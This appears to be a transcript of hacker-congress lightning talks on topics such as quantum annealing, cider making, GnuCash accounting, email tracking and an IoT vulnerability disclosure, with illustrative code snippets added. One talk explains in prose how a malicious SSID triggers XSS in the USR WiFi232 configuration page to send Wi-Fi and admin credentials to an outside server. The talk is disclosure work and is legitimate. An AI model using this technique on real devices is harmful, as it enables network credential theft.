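# needs no QPU; on the real machine you would use a DWaveSampler instead.
sampleset = dimod.ExactSolver().sample(bqm)
for sample, energy in sampleset.data(["sample", "energy"]):
    if energy == 0:      # cost 0 means the constraint is satisfied
        print(sample)
```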
The row constraint itself can be translated into a cost function like this. Every field on the chess board is represented by a qubit that is either one, if there is a queen on it, or zero, if the field is empty. Then you can set up this cost function for the row, where you add up the four qubits, subtract one, and square the result. You get the lowest cost, zero, when there is exactly one queen in the first row. And similarly, you can set up cost functions for the diagonals and columns. When you put all these parts of the cost function together, you can write it as a matrix equation like this, where q represents the current configuration on the chess board, so the qubits that are either zero or one, and H is the matrix of your problem that you get from the cost function. Then you simply feed it to the D-Wave system with a simple Python script like this, the machine returns you several solutions, and you just have to pick the ones with the lowest cost. And then your problem is solved. So, no big deal, no Schrödinger equations lurking around and so on. School kids can do it if they are clever enough, and my students were. If you want to know more about this project, the students are here, live on stage at seven o'clock in hall two at the Kairse zone. They will give a talk in more detail and be there for questions and answers. And we also have a website where you can look at the project documentation; it was a Jugend forscht project. My students have also given a talk this year at the International Supercomputing Conference in Frankfurt, and this talk was recorded; you can find it under this link on YouTube. So thank you for your attention, and see you hopefully this evening. Thank you. So next up is Opencast. So hi, I'm Lars. You might remember me; I'm not only involved in the Emissions API, I'm also a main developer of Opencast, which is a free and open source software for, basically, video recording, processing and distribution, and its main focus is on the academic world, so universities recording their lectures, for example. The basic idea behind Opencast is that while here, for example, in this lecture hall, we have dedicated people recording stuff, as a university you couldn't do that on a large scale in your usual lectures. And you could also not force your lecturers to deal with the technical problems of video recordings. That may work for the very few lecturers who are interested in this topic, but for most it simply doesn't; most are really not interested in the technology behind this and in doing that stuff themselves. So having this automated, having the equipment, being able to just schedule a recording for a talk or a regular course, is immensely helpful. Then the recording happens automatically, it gets processed, and you can configure the processing: you can do video transcoding, and you can also do some media analysis. For example, Opencast supports slide detection, you can do things like text extraction from slides, to search through these slides later on, or speech-to-text, for example. All these steps are configurable, and you can do them or not do them, depending on what you want to achieve: do you want to push all of your sources out as fast as possible, or do you want to have as many analysis steps as possible? If you want to test this out, you can go to develop.opencast.org, which is a test server that is reset on a daily basis and runs the latest development branch of Opencast.
There are also other test servers out there, but that one usually works quite well. It's also up most of the time to develop. It's pretty stable. If you happen to break it, please let me know. I can just simply reset it, but usually it's up and working. So talking a little bit about open source projects also means that it's also interesting to talk about the community behind these projects. Opencast is a quite old project by now, so it's about 10 years old, and it's used at universities worldwide. Looking at Germany here specifically, it's actually one of the most used lecture recording solutions out there. So there are some commercial competitors, but I think we are in Germany specifically above these commercial competitors. Unfortunately, not true worldwide, but at least in Germany it is. Looking a bit more about the community, this is for example the package repository maintained by Opencast. We can register, and these are the registrations from this package repository, which looks quite nice, because you see it's used worldwide. It doesn't necessarily mean that all of the people who registered here are actually using Opencast, but it also doesn't mean that you have to register to actually use it. So some dots will probably not use Opencast and others will use Opencast, but are not on this map, but it at least gives you an impression of where Opencast is used. Looking at other community events, you also see that to these community events, a large part of this community shows up. This is two photos taken in Valencia at the International Summit of Opencast, and at the Technical University of Ilmenar in Germany at the local German meeting of the Forza project. If you want to know more about Opencast, you can contact me, talk to me, or talk to the larger German community, or the international community, or that, and just find out about the project. So, thank you. Thank you. Next up is Cider or Cider by Food Hacking Base. All right, there you go. Hello, everyone. Just if it works, yes. My name is Frantisek Apfelbeck, I'll go during computer work, and I'll be presenting Cider. Cider is an alcoholic beverage from Epoz, done especially in France, England, and the north of Spain. Historically, we know it's around 2,000 years old, let's say. We have the records, the regions I mentioned, science of production in Europe. I would say that at the moment, England is the bigger producer and drinker. France is behind, and after Spain. Quality-wise, I would vote for France, because the traditional methods of production are still in place, and not even the laws are stricter, but actually somehow, the whole industry follows the good quality standards more. Not sure why, but definitely better than England at the moment for the mass scale. Now, I will talk a little bit about how you do it. Harvesting, manual versus mechanical. I do manual harvest by the hands on the field, on the knees, in the pane, or basket, which I get in my socks, and after that, I have to get it to the place where I process it, which means 13 kilos in each hand, after it to the back, 25 kilos, a hoop, 200 meters, for example, to my remork, from the remork, on the place where I do it, and after that, you have to make something with that. You crush it by crusher or wrap, there are different techniques or different machines, or you can do it also by the hand, which you don't want to, if you want to be survivor. You will press it later on. 
There are many different types of presses, pneumatic ones, press apache, you would do the, in the German, the water press, many ways. After pressing, you may wait for two, three hours for special chemical reactions to take place. You would do kovach, special French technique, still done in most of the production. After pressing off the mark, you will get, sorry, after pressing off the apple pulp, which is called mark, you can actually add water to get second pressing, like in wine, it will be called remyage. Once you have your mood, your apple juice, you actually would like to do defocation, which in English means shitting, which is basically a purification by the co-legation of the pectin, the solution is clear, lower on the nitrogen and lower on the yeast cells, so it ferments slower. After that, you would like to do sutirage, which is also called wrecking, which means transfer of the cider from cast to cast or your container or cube to the cube, decreasing the depot on the bottom and decreasing also the amount of the yeast cells and sediments, so you can slow down the fermentation. When everything goes well, you will end up with a cider, which is actually decent enough to put in the bottle, so you will have to embottle it. If you press in October, November or December, there's a cider season, you may be as a traditional maker harvesting actually or bottling around March or February, March, April, maybe May, not so good after. You put in a bottle, generated by gravitation, and if all goes well, you will do pris de mous naturel, which means you put a cork in, muslin around, any hope and pray for a few months that the bottles will be fizzy, but not too fizzy, meaning they will not explode. There are many ways how to screw it up, and most of the time you find one or two on the way. Now, products. You have apple juice, bigger and bigger thing in Normandy actually, where I am now based. You have cider, which is generated between three to six persons in Ireland, sorry, in France around four to five. You have a lot of whey, which means a young distillate, which is kept in the glass, it's not age. Calvados, which is an appellation origin, generally around 40-50 commercial one, aged in oak barrels for years, at least two or more. You have vinegar, many times with fioside it doesn't go well, it ends up like that. Or you have pommel, which is a melange of calvados and jude pomm, aged in oak barrels for around 12 months or more. These are the basic products which you can do. Also, you can mix and concentrate and play around, you can make the cider on a glass and many other things. Now, you would like to check when you make your cider, the first thing, specific gravity. You press your juice, you check the specific gravity, so you know the amount of the sugars, and at the end you can say how many actually, how much alcohol you get. You check your pH, if you can, nitrogen calcium in the lab, so your bottles don't explode and your defecation happens. You would like to ferment around 8 degrees of temperature if you can, and you check that you don't have too much of bacteria contamination. Because if you do, then you are in trouble and you may get explosions. Now, this would be very simple overview of cider making. If you want to know more, visit Food and Kim base, which is in the hall two, and we can talk, we can taste, we have cider tasting, which is fully booked, but there are some ciders which we can offer and you can have a bit of taste what I do and other people do in the field. 
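Frantisek mentions checking the specific gravity of the pressed juice so that at the end you can say how much alcohol you will get. A common homebrewing rule of thumb for that estimate, which is my addition since he does not state a formula on stage, looks like this:

```python
def estimate_abv(original_gravity: float, final_gravity: float) -> float:
    """Rough percent alcohol by volume from the gravity drop.

    Uses the widely quoted homebrewing approximation ABV ~= (OG - FG) * 131.25;
    a careful cider maker would refine this with temperature correction and a
    proper sugar analysis.
    """
    return (original_gravity - final_gravity) * 131.25

# Example: fresh apple juice pressed at 1.050, fermented bone-dry to 1.000
print(f"{estimate_abv(1.050, 1.000):.1f}% ABV")   # roughly 6.6% ABV
```

A French cider stopped while still sweet keeps a higher final gravity, which is why the typical strengths he quotes sit around four to five percent rather than the fully dry value above.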
Thank you very much and I do hope to see you soon and enjoy the cider in general in your local regions. Thank you. Bye. So next up is Menschen beurteilen. Wait a minute. So this one. He's coming. Hi. So it's actually the opposite of mentioned beurteilen. This is supposed to be a non-judgmental talk. I use this. So we're going in the direction of healing. And for that reason, I'll start by introducing the plan for how we can have healing on earth and then I will go into discussing one of the obstacles. So first the plan. You begin by sharing values and values are word harmonics whose true meaning requires human discourse and intention. So there's a lot of values, but what's a good example? Like, do you say that you're hiding fugitives or not? And so there are a lot of word harmonics that we have yet to discover and that's the first step is discovering our values and sharing them. A federation, by the way, in this context is defined as any two people who share values. So it's really easy to federate, just share your values. The second step is to develop a healing base, a healing basis upon which we develop our work. So humans have been doing it backwards for our entire history. We take a value like leadership or function or anything you want and we put it above as a goal and then we try to get to it and we lose our values. So we inevitably don't have the social structures to support the goals, which means that we have to start with a healing basis. So the second step is after sharing our values to develop a network of healing and then the third step is to share that with the world. So yeah, the big obstacles, this isn't a judgment talk. I had a dream the other day where there was a Mexican standoff and everyone had their guns pointed to each other and they all grabbed each other's guns. They went off and confetti went everywhere and we were asked, are you a dancer or a judge? And so this is trying to dance more. And the question is, is there a healthy attitude toward the system in which price is a value? So there it is. We'll call it Mr. C. And it works for each of us, but what's the real issue here? The issue is that price, that the irrational actor has to sacrifice most other values in order to get to the value of price because inevitably it's really clear what has more value, right? Price. So the other problem with that is that you're also most willing to have one and then you, again, we lose our values. So we're talking about you've got price value and you've got all the other values and this is a system in which we are asked to focus on price. So obviously there will be problems in things like externalities or thinking about the future. Anything that you actually can associate with human values is at risk. So we need money. We need to think about people who are not going to be developing a healing system but who we also need to heal and we also need to do this culturally. Like the state is very unlikely to help us as well. This needs to come from the heart. So the real question is, is peace sexy? I don't know. But price really isn't. Price guides this in a sky. So it ends up being about developing a basis of healing. The main idea is that we always develop our work in terms of a goal and making money or developing a great product or something like that. But the goal of this is to invite you to think differently and develop every one of your work products in a context of healing. And there are four ways of looking at that. So I don't have a cool diagram for this. I'm sorry. 
But you can consider it in a box of four, where the two top categories are human and environment. So we're healing the worker and the environment that they work upon. And then we also have to heal the deficiencies that are caused by the work and the overabundance that is caused by the work: the trash, maybe the manual labor that hurts the body. But consider every work we do in the context of a healing basis that we all have to develop. And then, if we develop that healing basis and define all our work within it, then we won't really have any more problems. So I think it's pretty simple. But I'll be working on it and I'll be at the Eco Hacker Farm. You can find me there. And thank you for your time. Thank you. Next up is: why do we need a supply chain law? This talk is in German. A supply chain law, a Lieferkettengesetz. Sorry. Imagine this: you're sitting in your hackerspace and you want to solder something, so you take a soldering iron in your hand. In this soldering iron there are various raw materials, including iron. And this iron was mined somewhere in the world, for example in Brazil, for example here in Brumadinho, where a dam broke at an iron ore mine, a toxic mudslide poured over a village, and more than 200 people died under it. The dam had been certified as safe only a short time before, namely by TÜV Süd, a German company. And in the meantime there is evidence that safety issues had already been noticed during the inspection and that the mine operator then pushed for the certificate to be issued anyway. For the victims and their relatives it is very difficult and very complicated to take legal action against TÜV Süd for obviously not having worked carefully here, because the relatives are in Brazil and TÜV Süd is in Germany. A small aside: the federal government carried out a survey among German companies this year on how they deal with human rights. The question was whether they fulfil their human rights due diligence obligations according to the current standards, and only about 20 percent of the companies do — so much for human rights in the German economy. That is why there is the supply chain law initiative, the Initiative Lieferkettengesetz, which I would like to introduce today. This is a broad civil society alliance that is supported and carried by many large organizations, Greenpeace among them, and many more. I would like to introduce the core principles of this initiative. Whoever causes damage must be liable for it: if a company causes harm abroad, for example by having its T-shirts sewn in an unsafe factory or by disposing of its waste illegally, then it has to be held accountable for this. Irresponsible companies must not enjoy an advantage. At the moment they do, because they save money by looking away while human rights are violated, and we cannot put up with that situation. Responsibility must not be offloaded onto consumers. The question of whether human rights are respected should not have to be answered a hundred thousand times through individual purchasing decisions; human rights have to be guaranteed for everyone, and that is why we as a society have to make sure they are respected for everyone. And human rights violations need to be actionable in German courts.
It must be completely self-evident that if someone comes to harm abroad through the business activities of a German company, that person can also take legal action against the company here in Germany. And voluntary commitments are not enough: when companies commit themselves to voluntary measures, these are too often only small steps that do not eliminate the actual problems. If you want to learn more about the initiative, take a look at the initiative's website, lieferkettengesetz.de. You will find a lot of information material there, you will also find the exact demands, and you can sign the petition online, which gives the initiative's political lobbying work additional weight. Thank you. Thank you. So, hello, I'm Felix Petersen and I want to present some of my research, Pix2Vex: unsupervised 3D reconstruction. So, what did I do? What is 3D reconstruction? We start off with an image, for example of this shoe, and we want to reconstruct the 3D model that underlies this structure so that we can... oh, the GIFs are not working. That's really bad. Okay, so it should rotate and it should show the 3D model. And I want to do this unsupervised, so the 3D model is not given. Here I have two examples. We have a neural network that is trained to reconstruct the 3D model on the right from the respective images on the left, but the new thing is that the 3D model is not supervised, so we cannot say whether the reconstruction was correct and in which direction to train the neural network to give an appropriate reconstruction. And like a school class, if it's unsupervised, it gets a bit chaotic. I want to show you that it's still possible to do the reconstruction. You might wonder whether it's magic or something, but I want to show you that it's science which underlies this 3D reconstruction and that it can really work. So, we start off with an image, for example of this bunny, and then we do a reconstruction. What exactly happens in the reconstruction is not so important; what's really important is how we can supervise whether our reconstruction is correct. So we render it again, but there we need to be a bit cautious, because we still need to put the result through the neural network, so we cannot just do standard rasterization. Thus we need smooth rasterization and a smooth Z-buffer, so the result will also be a smooth image. And there we have a problem: our round trip doesn't really work yet. If we try to train on that, it will not converge and it will crash. So we need to reconstruct the texture and the style of the image. And how do we do that? We use a pix2pix network. For example, when I drew this cat, I could just apply a pix2pix network to make a photorealistic image of a cat. Then I drew the city hall of Leipzig, and the city hall of Leipzig also looks quite cute — as a cat. You might wonder why it is a cat. In the training data, the left side was always these edges and the right side was always a cat. So no matter what you put in on the left, a cat comes out. If you put in the CCC logo, you will get it as a cat. If you input bread, you will get cat bread. And if you input this, you will get a multi-eyed alien. If you want to try that at home, you can just Google for pix2pix and you will find a website where you can try it out yourself. So, with this component, we have this round trip and we come back to the original image. And then we train this, and unfortunately it still crashes. So, why is that? We have here a lot of components.
And if we just stack them on top of each other, the whole thing collapses like a badly built tower: the entire architecture crashes if there are too many steps after each other. So, how do we stabilize that? We stabilize it using a GAN, a generative adversarial network, where we have a counterfeiter which forges money. Then we have a bank which has a hobby and wants to print money, so it prints money. And then we have the discriminator, or the detective, who distinguishes real money from fake money. Over time he gets better at detecting the money from the counterfeiter, but then the counterfeiter gets better at forging the money. So in the end, the counterfeiter can forge money better than the bank can print it. And at this point, the texture can also be reconstructed. So if we apply this concept to our round trip, we can train it stably. And here are some results. On the left side are the input images, and on the right side are renderings of the reconstruction. And to show that this also works on real images and on single images, I went to a website and downloaded 50,000 images of shoes. Then I trained it only on these camera-captured images of shoes, and as you can see, it was still able to do a 3D model reconstruction from that. So, I thank you for your attention, and if you have any questions, you can come up after the talk. Thanks. Thank you. I still have to get that cat image out of my mind. All right, next up is BalCCon 2020. Good morning. Do you know how it looked when a guy turned a badge into a taser? Or how bad hackers are at karaoke? Or how it looks when you call an elevator in the U.S.? If you don't know, then you have to join the next BalCCon. Hi, I'm Jelena. I'm the co-founder of BalCCon. BalCCon is the Balkan Computer Congress, an annual event held in Serbia, in Novi Sad. We are not living in Serbia anymore, but we want to contribute to our home country, so that's why we started organizing something there. Novi Sad. Why Novi Sad? It's our hometown. Very beautiful, 80 kilometers from Belgrade. Very nice. Some key facts about the congress: we started in 2013 as a small conference with, let's say, less than 100 people and around 20 speakers, something like that. Over seven years we grew to 500 visitors, and we have more than 40 speakers from more than 20 countries. Some of the highlights from BalCCon, guests who have been with us and who are supporting us now: Travis Goodspeed, virus, Zoz, Mitch Altman, Robert Simons — there are a lot of them, you name it. We try to give them the best. What's good at BalCCon is that you can also join us playing CTFs. So if you want, there is a CTF, you can play with us. What's also interesting is that we have a Hebocon too: we started it this year, found it very interesting, and we will continue it. If you have any questions about how to get there — because I know Serbia is not such a popular place and many people have not visited it yet — if you want to find out how to reach us, you can visit us at the BalCCon assembly, or you can contact us and send us an email. We will gladly help you. We would like more people to come from abroad to visit our small conference, because we are building a community in Serbia and in Europe, and we want to show them what it looks like. And I think that's important.
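The counterfeiter/detective analogy from the Pix2Vex talk above is exactly the standard GAN training loop. Below is a minimal sketch of that loop on toy one-dimensional data, assuming PyTorch is available; it has nothing to do with the talk's differentiable renderer or its actual models, and the network sizes and hyperparameters are arbitrary choices of mine. It only shows how generator (counterfeiter) and discriminator (detective) are trained against each other.

```python
import torch
import torch.nn as nn

# Toy task: the "counterfeiter" (generator) learns to fake samples from N(4, 1.5)
def real_data(n):
    return 4.0 + 1.5 * torch.randn(n, 1)

G = nn.Sequential(nn.Linear(8, 16), nn.ReLU(), nn.Linear(16, 1))                 # generator
D = nn.Sequential(nn.Linear(1, 16), nn.ReLU(), nn.Linear(16, 1), nn.Sigmoid())   # discriminator
opt_g = torch.optim.Adam(G.parameters(), lr=1e-3)
opt_d = torch.optim.Adam(D.parameters(), lr=1e-3)
bce = nn.BCELoss()

for step in range(3000):
    # 1) Train the detective: real samples should score 1, fakes should score 0
    real = real_data(64)
    fake = G(torch.randn(64, 8)).detach()        # don't backprop into G in this step
    loss_d = bce(D(real), torch.ones(64, 1)) + bce(D(fake), torch.zeros(64, 1))
    opt_d.zero_grad()
    loss_d.backward()
    opt_d.step()

    # 2) Train the counterfeiter: it wants its fakes to be scored as real
    fake = G(torch.randn(64, 8))
    loss_g = bce(D(fake), torch.ones(64, 1))
    opt_g.zero_grad()
    loss_g.backward()
    opt_g.step()

with torch.no_grad():
    samples = G(torch.randn(1000, 8))
    # The fake distribution should drift toward mean 4 and std 1.5
    print("fake mean/std:", samples.mean().item(), samples.std().item())
```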
There are a lot of students there who don't have much money to travel, and that's one of the reasons why we started this: in Novi Sad you have a big technical university with a lot of students, young people who are interested in technology and hacking. So, the key facts from this whole story: BalCCon 2020, 25th, 26th and 27th of September — that's for remembering — in Novi Sad, Serbia. You have the webpage for the rest. Please contact us. Thank you. Thank you. Next up is a concise introduction to double-entry accounting. All right. Hello, everyone. I'm going to skip the intro today because I've already done that yesterday. My name is Luis and we're going to talk about double-entry accounting. What I'm going to talk about has been known for a few centuries, it's what accountants use today, and the way I'm going to frame it is heavily influenced by my use of GnuCash. Accounting lets you track money movements across accounts, and we have five different types of accounts. Type one, assets. Asset accounts hold the money that you have, for example in your bank accounts; it could also be a physical asset whose value you can estimate. Type number two, expenses. Expense accounts hold the money that you have spent. Type number three, income. Income accounts hold the money that you have received, for example from a salary. Type number four, liabilities. Liability accounts hold the money that you owe to someone else; it can be any form of debt. And type number five is a bit more abstract. It's called equity. You have to imagine equity as the global wealth in the world from which your own money is carved out, and you use the equity accounts to set the initial value, the initial balance, of your asset accounts: you take the money that you have from the world, note that it's yours, and use that to set the opening balances of your asset accounts. Accounts form a hierarchy, and you can see in this picture on the left that the top level of the hierarchy corresponds to the five different types I've laid out before. Now let's take an example of what money movements look like in double-entry accounting. In this example, I have four different accounts. An account that represents my wallet, that's Assets:Cash; an account that represents my checking bank account, that's Assets:Checking; an account for categorizing food expenses, that's Expenses:Food; and an account to categorize banking fees, that's Expenses:Fees. Let's add two transactions to those accounts. The first transaction at the top is a $20 withdrawal from the bank for which I've incurred a $3 fee, which is a very common thing in the U.S. And then, with the money in my wallet, I've bought some food. Within transactions, we have a further concept called splits. A split is either a debit, meaning you take money out of an account, or a credit, meaning you put money into an account. So, for example, in the first transaction we have three splits. On the left, we have the $20 credit to my wallet; then we have the minus $23 out of my checking account; and then, on the right of the first transaction, we have the $3 fee. Same thing for the second transaction. A fundamental property of double-entry accounting is that within each transaction, all the splits — all the debits and credits — sum up to zero. And that's super interesting, because it means that with this rule you cannot make money appear or disappear. Double-entry accounting is very much like chemistry.
You cannot invent elements from nowhere. Nothing appears, everything gets transformed. It's exactly the same concept. Likewise, if you add all the splits in the other direction, meaning all the splits in a single account, you actually get the balance of that account. So in my wallet I had a $20 credit and then an $8 debit, and so the balance in my wallet is $12. You can do this for all the other accounts. This zero-sum property is reflected in the accounting equation. The accounting equation is how you calculate how much money you actually have, your net worth, and it's just a simple subtraction: you take all of your assets and you subtract all of your liabilities. So you take all the money you have and you subtract all the money that you owe, and that tells you how much money you actually have. GnuCash displays that at the bottom of the account hierarchy. Then I'm going to give you a few tips about GnuCash. The documentation is split in two. There is a help manual that's about the interface itself, and then there is a concepts manual that dives deeper into what I've explained today and yesterday: it covers accounting and the different accounting methodologies and so on. And I found the concepts manual much more helpful than the manual for the interface. Then I have some GnuCash tips. This is not exhaustive and I'm not even going to go through all of it, but I think my favourite ones are — and the first one is not on the slide — when you start using GnuCash, do not try to import all of your transactions, all the history that you have in your bank. Just start from today: take how much money you have in your accounts, set that as the opening balance, and go forward. Don't spend days trying to import all of your history; it doesn't really matter. Another of my favourite tips is to use a mobile app to track your cash expenses. There is one on Android that's supported by the project, and there is another one on iOS that's a bit harder to use but it's fine. GnuCash is a very mature piece of software. Some people tell me the interface gave them eye cancer. GnuCash didn't give me eye cancer. It's clunky, but it doesn't matter: accounting hasn't changed in centuries, it's fine, it works. I find it cool to be able to back up a version of your accounting books; that's what the file GnuCash gives you is, so archive it — that's cool. What else? Yeah, unlike other things at congress, accounting is something you cannot really hack. If you're hacking it, you're doing it wrong. You need to understand what you're doing. And that's about it. I can help you set up GnuCash any time today or tomorrow. Feel free to contact me, and that's about it. Thank you so much. Thank you. Next up is Your Crowd. Okay. Hey guys, my name is Till. I'm part of a small group of legal professionals and we want to present a small idea of ours which we call Your Crowd. So this talk is going to be about the legal tech market in Germany, a problem that we see of possible monopolization or oligopolies, and a solution that we call Your Crowd. So we start with the legal tech market in Germany as such. It started in the 1970s with legal informatics. People tried to bring informatics and legal professionals together, because legal language is basically pretty rule-based, so you can try to automate it quite simply.
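To make the split and zero-sum rules from the double-entry accounting talk above concrete, here is a minimal sketch in plain Python. It mirrors Luis's example accounts but has nothing to do with GnuCash's actual file format, and the sign convention (positive = money into the account, negative = money out) is simply the one used in his example.

```python
from collections import defaultdict

# A transaction is a list of (account, amount) splits: positive amounts are
# credits into the account, negative amounts are debits out of it.
transactions = [
    # $20 cash withdrawal from checking, with a $3 fee
    [("Assets:Cash", 20.00), ("Assets:Checking", -23.00), ("Expenses:Fees", 3.00)],
    # buying food with the cash in the wallet
    [("Expenses:Food", 8.00), ("Assets:Cash", -8.00)],
]

balances = defaultdict(float)
for tx in transactions:
    # The fundamental rule: splits within one transaction must sum to zero.
    assert abs(sum(amount for _, amount in tx)) < 1e-9, "splits must sum to zero"
    for account, amount in tx:
        balances[account] += amount

for account, balance in sorted(balances.items()):
    print(f"{account:18} {balance:8.2f}")     # Assets:Cash ends up at 12.00, as in the talk

# Accounting equation: net worth = assets - liabilities
assets = sum(v for k, v in balances.items() if k.startswith("Assets"))
liabilities = sum(v for k, v in balances.items() if k.startswith("Liabilities"))
# Negative here only because the checking account's opening balance (normally
# set via an Equity transaction) was left out of this toy example.
print("net worth:", assets - liabilities)
```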
But in the 1970s we had storage capacities which were limited and also the computing capacity was limited. So we had lots of ideas but we just could not implement it which changed around like 2011 till 2017 where lots of companies put up and they put up some nice tools on the market where it's not rocket science, it's mostly about text analysis, text recognition and you try to optimize simply legal analyzes. But that lead to a lot of efficiency on the legal market because some lawyers could simply, they had a lot of repetitive work and now they can try to optimize via legal tech and save their time. So some lawyers reduced the working time by 70% having the same income as such and now they spend 70% on pro bono work which they could not do before. And another thing is that we now have a greater access to justice. An example is FlightRide. No one cared about flight delays before FlightRide and now even we have a new system with Avocado and they get your money back from here FlightRide even for free. So and these are a lot of companies that work in that market. Well what's the problem that we see there? It's not necessarily the the technique as such even if we can discuss it but it's more where that comes from because at the moment it's more that startups with a lot of venture capital and a lot of big law firms who are outsourcing their development implement their technique. And they have a lot of money to produce the products that they want and they produce mainly software which is specialized for small law firms or their law firm and which is made perfectly for their firm either if the workers in the law firm work with the software internally and make it perfect or externally. And they invest mostly in software and their own workers to do so but small law firms cannot do that really. So because they have no money no time to do that and they don't have the capacity of big law firms which can work collaborative with IT specialists and have very big teams to work on that problems. They only have individuals who have an IT interest maybe in the law firm who try to implement that thing so some of them are a bit upset about that because we might get new dependencies because big law firms try to implement their software license it to small law firms and on that way these products get on somewhere pretty expensive. And on the other hand also the big law firms get on the market of the small law firms because big law firms before just focus on the big cases not on the small ones the small law firms took care of and now they get in that market and it might be the chance that we get something like Google on the legal market. It's not necessary that will happen but it might be the case which is not necessarily new that we have these dependencies because in law we don't have a system of open knowledge as in other sectors we have two privatized search engines like back and yours for legal knowledge and they're pretty expensive. But with legal tech now we might get just new dependencies by automizing your processes in your legal law firm or you just might disappear from the market if you don't use their techniques. So we will think okay how could you change that and we looked in practice and we saw okay in informatics you just used GitHub to share knowledge you just talk about what you're doing which lawyers at the moment don't do they don't share knowledge. 
We have projects like Gaiacs where they try to upload lots of documents in the cloud even if you don't like the cloud as such but the idea to share documents is interesting and we know that we can distribute work even if we don't like captures but it shows that we can distribute work over a huge crowd and get things done and we saw this guy this is Joseph and he was able to predict court cases or well doesn't matter I just skip that but our idea is well we just combine expert systems like lawyers let them form a crowd a group to share their knowledge their documents maybe use algorithms like machine learning to get something out of their documents which we have not seen before and let them try to distribute the work to develop their own techniques which they want like we have it with GitHub with informatics bring the lawyers together and let them share their knowledge all they have and maybe let them form collaborative teams so they can work and if you want to help us contact us thanks thank you all right next up then is there's JavaScript in my power plug hey I'm Harry welcome to my talk there's JavaScript in my power plug I will tell you the story how I found my first cde you pressed the wrong button I think because you don't press anything right now please now go ahead to the right yeah because working yeah one day I walked through a supermarket and found a smart IOT power plug and it promised it can be controlled via an app from all around the world and I thought hey um maybe I'm able to control it without it or somebody else is able to control it also so um I started reverse engineering it first we dumped the flash image and saw some JavaScript flowing through our terminal so one of my colleagues said hey there's JavaScript in my power plug um then we used simple tool tools like strings to um analyze the binary and found that they are clear text Wi-Fi credentials in the flash image which is also a very interesting point so we used GDRA to reverse engineer it and to search for bugs and especially for the configuration interface where the JavaScript comes from so it details to the cde um it is a bug in the usr Wi-Fi 232 module it is like kind of a shitty ESP and it is in the configuration interface um where you can obtain status information do firmware updates and this configuration interface also renders a list of nearby Wi-Fi networks where you connect to um so what you see on the bottom is the source code maybe you already have an idea about the bug because if you open a Wi-Fi network with a malicious SSID nearby so if you put JavaScript in your SSID and somebody opens the configuration interface and reloads the page then this JavaScript gets executed and we have a cross-site scripting attack um this can be utilized by loading a more complex script from an external server and within just this JavaScript we can then do an HTTP GET request to the web interface page where the Wi-Fi credentials are inside and append this result to a request to a domain we control or for example to request catcher.com so we can leak the Wi-Fi credentials um from the home network where this module is locked in this looks like that on the right side you can see the JavaScript export code um it is not very well written but enough to show the concept on the left side you can see the request catcher um the sensor part is the password and um below this you can see that it's also possible to leak the username and password of the web configuration interface itself so some words to the disclosure process um it is 
a Chinese company from Shenzhen who produces this module and they didn't react to any of our emails so we requested a CVE from CVE.mitra.org um I'm currently doing this lightning talk and I also write a blog post at Tilda Home so a short conclusion um if you use this module in your Wi-Fi network it is possible to steal the Wi-Fi credentials via cross-site scripting export by opening Wi-Fi nearby with a malicious SSID next step could be um to gain code execution in the code there are a lot of Sprint Fs without a length check and seems like they wrote their own protocol parsers for example an own DNS parser and custom protocol parsers um we expect some buffer overflows to be found there um which can be exploited so if you want uh details and the proof of concept code um you can have a look at the blog post or you can contact me via email or decked thanks for your attention thank you all right next up is Meriway Research Telegram group thank you welcome everybody this will be a short lightning talk about a open research group we have on telegram uh there are currently nearly three and a half thousand members in here so first up I'll tell you really short something about myself what the group is and how you can join and I think that should all fit within five minutes so my name is Max Kersti I go by the nickname of Libra I'm one of the administrators of the group um I worked as a malware analyst before I currently I work as a threat intelligence analyst I write my own blogs uh and tools which I also discuss in the group together with other people who also do similar things so what is it it's a public group meaning anybody can join there's no vetting no invite process the last slide will contain the join link for whoever wants to join uh we're strictly white hat we don't do pawning of anything uh we just analyze them all where I help each other out when we have questions uh the target platform you have or the architecture doesn't matter too much there will always be someone who can help you out so you can have a couple goals when you join the group itself uh you can stay up to date on the latest news and developments uh new tools that are being released uh are also published in here you can learn from the questions of others maybe someone else is stuck with a problem you never had or never encountered by chance uh but you might have use of in the future you can collaborate with people uh there's multiple small groups that split off that did small things uh I created a group there's small subgroup uh myself and a couple of people I know in there we have some projects running you can ask any question you like as long as it's related uh we have a weekly item uh the current week is week two for the running of this uh where we in this case for example discuss things that you within your company your experience uh changed within a company or with uh within a network uh and see what had the benefit out of that so we can all learn from each other there uh there's a pin message with resources these resources uh vary uh some of them are how to obtain new samples some of them contain tips and tricks some of them contain posters but in general there's a list of resources that you can use the rules are also described in there uh the tldr of the rules is be excellent to each other and and don't do anything weird um the group consists of students and professionals alike uh I don't believe there's much of a difference uh aside from some experiences in some cases but it's open to anybody who wants to join um as 
a last remark at the end of all lightning talks so the end at 1345 uh we'll be having a first meetup at the left exit of Borg uh starting from around uh 1345 till uh 1400 is the gathering I guess and then if there is enough people we'll just move somewhere and if not we just stay there uh since we don't want to block the exit for others if you want to join this is the join link uh you can also search within telegram uh for malware research and you should find this one uh you can take pictures you can write it down uh do whatever you want with it and uh hope to see you either in the group or uh the exit after all lightning talks thank you thank you next up is privacy mail there we go okay thanks a lot um so uh I'm going to be telling you something about uh privacy mail it's an email privacy platform that we developed at teodamstadt uh we is myself Stefan Schwer and my professor Matthias Hollig um and also uh yeah so um your first question might be wait email tracking I mean usually when we talk about email privacy we talk about Alice and Bob wanting to exchange a message and we don't want like all of the evil people that are on the wire and in the servers to know about it um this is not what we're talking about here we're talking about the fact that the sender of the message wants to actually know if the recipient of the message has read the message so it's not private communication between two people it is for example amazon sending you a newsletter and wanting you to click links um when you want to track emails um there's usually three different things you can do you can track views so you can track it by for example including remote images or remote style sheets and then when the email is opened with remote content enabled uh a request will be sent to the server of the analytics company and uh they will know that you open the email the second thing is you can track interactions uh this usually happens by using personalized links so you have a link that is only used in this specific email to this specific person and if that link is clicked you know that this person clicked this specific link in the email fairly straightforward and finally you can also link identities because if you think about it you have your emails usually on your laptop and on your phone and then you will have um like all of the nasty web tracking that is going on um which will have a profile of you on your phone and the profile of you uh on your laptop but if you click the same link or a link with the same identifier uh both on your laptop and on your mobile phone then this can be used to link the identities that they have so they can basically merge the profiles from your phone and from your laptop so this is actually fairly interesting so um depending on who you ask between 24 and 85 percent of emails contain tracking the truth was probably somewhere in the middle um the person sending you the email knows if you open the email when you open the email which device you used um which software you use so Thunderbird webmail whatever and where you were based on loose IP based geolocation of course always if you have remote content enabled and click links and all of this stuff so uh we built a software that is intended to detect this kind of tracking and uh make sure that um you basically know what you're getting into when you register to a newsletter and to do that you go to our website uh privacymail.info and you tell us look I want to sign up this specific service like example.com and then we give you an email address 
